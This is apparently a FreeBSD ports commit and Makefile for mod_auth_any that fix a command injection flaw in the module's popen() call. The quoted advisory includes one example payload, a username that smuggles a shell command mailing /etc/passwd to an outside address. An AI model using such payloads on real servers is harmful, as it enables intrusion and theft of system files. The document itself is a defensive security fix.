0025bdf0b2
the server with the uid of the apache process.

Background [1]:

"The module accepts a username and password from the web client, passes them to a user-space executable (using popen(3), which invokes a shell) and waits for a response in order to authenticate the user. The password is quoted on the popen() command line to avoid interpretation of shell special chars, but the username is not. Thus a malicious user can execute commands by supplying an appropriately crafted username. (e.g. "foo&mail me@my.home</etc/passwd")

"The problem is easily fixed by adding quotes (and escaping any quotes already present) to the username and password in the popen command line."

o Fix this by adding an escaping function from [2]. Then, modifying this function appropriately with ideas from [3]. Apply the new escaping code to mod_auth_any.
o Bump PORTREVISION

Submitted by: Security Officer (nectar), Red Hat Security Response Team <security@redhat.com> [1]
Obtained from: mod_auth_any CVS [2], nalin@redhat.com [3]
34 lines
785 B
Makefile
# New ports collection makefile for:	mod_auth_any
# Date created:				10 April 2001
# Whom:					will
#
# $FreeBSD$
#

PORTNAME=	mod_auth_any
PORTVERSION=	1.0.2
PORTREVISION=	1
CATEGORIES=	www
MASTER_SITES=	ftp://ftp.itlab.musc.edu/pub/toolbox/mod_auth_any/
EXTRACT_SUFX=	.tgz

MAINTAINER=	ports@FreeBSD.org
COMMENT=	Apache module to use any command line program to authenticate a user

BUILD_DEPENDS=	${APXS}:${APACHE_PORT}
RUN_DEPENDS=	${APXS}:${APACHE_PORT}

APXS?=		${LOCALBASE}/sbin/apxs
APACHE_PORT?=	${PORTSDIR}/www/apache13

post-patch:
	@${CAT} ${FILESDIR}/bash_single_quote_escape_string.c >> \
		${WRKSRC}/${PORTNAME}.c

do-build:
	@cd ${WRKSRC} && ${APXS} -c ${PORTNAME}.c

do-install:
	${APXS} -i -A -n ${PORTNAME:S/mod_//g} ${WRKSRC}/${PORTNAME}.so

.include <bsd.port.mk>